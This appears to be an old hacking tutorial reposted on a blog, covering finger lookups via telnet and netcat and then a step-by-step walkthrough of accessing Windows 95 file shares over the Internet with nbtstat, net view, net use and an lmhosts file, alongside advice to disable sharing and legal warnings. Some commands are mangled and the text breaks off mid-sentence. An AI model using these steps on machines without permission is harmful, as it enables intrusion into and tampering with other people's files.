will not load images and Java applets for you.************************************************Getting Finger Information Via TelnetBy now, you've probably heard or read a lot about finger. It doesn't seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn't ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet?The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen.****************************************************NEWBIE NOTE: NT doesn't ship with a finger daemon (A daemon is a program on the remote computer which waits for people like you to connect to it), so generally speaking, and server that you find running finger will be a Unix box. I say "generally" because there are third-party finger daemons available and someone may want to run one on their NT computer.****************************************************The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don't know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as "No one logged on." Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as "root", "daemon", "ftp", "bin", etc.Another neat trick to try out is something that I have seen referred to as "finger forwarding". To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter:user@host1.comYou should see the same information! Again, this all depends uponthe configuration of the finger daemon.Using Telnet from the Command LineNow, if you want to show your friends that you a "real man" because "real men don't need no stinkin' GUIs", well just open up a DOS window and type:c:>telnet and the program will automatically attempt to connect to the hoston the designated port for you.Using NetcatLet me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to:http://www.l0pht.com/~weldNOTE: The first character of "l0pht: is the letter "l". The second character is a zero, not an "o".I know that the program is supposed to run on NT, but I haveseen it run on Win95. It's a great little program that can be usedto do some of the same things as telnet. However, there areadvantages to using netcat...for one, it's a command-line program,and it can be included in a batch file. In fact, you can automatemultiple calls to netcat in a batch file, saving the results toa text file.**************************************************NEWBIE NOTE: For more information on batch files, see previous versions of the Guide To (mostly) Harmless Hacking, Getting Serious with Windows series ...one of them dealt with basic batch file programming.**************************************************Before using netcat, take a look at the readme.txt file provided inthe zipped archive you downloaded. It goes over the instructionson how to download web pages using netcat, similar to what Idescribed earlier using telnet.There are two ways to go about getting finger information usingnetcat. The first is in interactive mode. Simply type:c:>nc 79If the daemon is running, you won't get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed:c:>edit rootand entered the username "root", without the quotes. Then fromthe command prompt, type:c:>nc 79 <>nc 79 <> nc.logto create the file nc.log, or:c:>nc 79 <>> nc.logto append the response to the end of nc.log. NOTE: Make surethat you use spaces between the redirection operators.How to Break into a Windows machine Connected to the InternetDisclaimerThe intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself.There are no special tools needed to access a remote Win machine...everything you need is right there on your Win system! Two methods will be described...the command-line approach and the GUI approach.Protecting YourselfFirst, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit thepassword to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy.i know lame oneWhat Can They Do?What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed.** The command-line approach **Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type:c:>nbtstat -A [ip_addr]If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like:NetBIOS Remote Machine Name TableName Type Status---------------------------------------------NAME <00> UNIQUE RegisteredDOMAIN <00> GROUP RegisteredNAME <03> UNIQUE RegisteredUSERNAME <03> UNIQUE RegisteredMAC Address = 00-00-00-00-00-00This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes).**Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate.The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>".**Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc.If you find a machine with sharing enabled, the next thing to do is type the following command:c:>net view [ip_addr]Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command:c:>net use g: [ip_addr][share_name]You will likely get a response that the command was completed successfully. If that is the case, type:c:>cd g:or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc.Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used.** The GUI approach **After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file:c:windowslmhosts.samRead over the file, and then open create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type:c:>nbtstat -RThis command reloads the cache from the Lmhosts file you just created.Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password.************************************************Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in.First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up:C:WINDOWS>netstat -rRoute TableActive Routes:Network Address Netmask Gateway Address Interface Metric0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "locahost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer.*****************************************************************************************************tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP!*******************************************************************************************************YOU CAN GO TO JAIL WARNING: If you find a Windows xp box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it. It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike!************************************************Final WordsPlease remember that this Guide is for instructional purposes only and is meant to educate the sysadmin and user alike. If someone uses this information to gain access to a system which they have no permission or business messing with, I (XAIN) cannot be responsible for the outcome. If you are intending to try thi

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Aruz Parajuli, Aruz Parajuli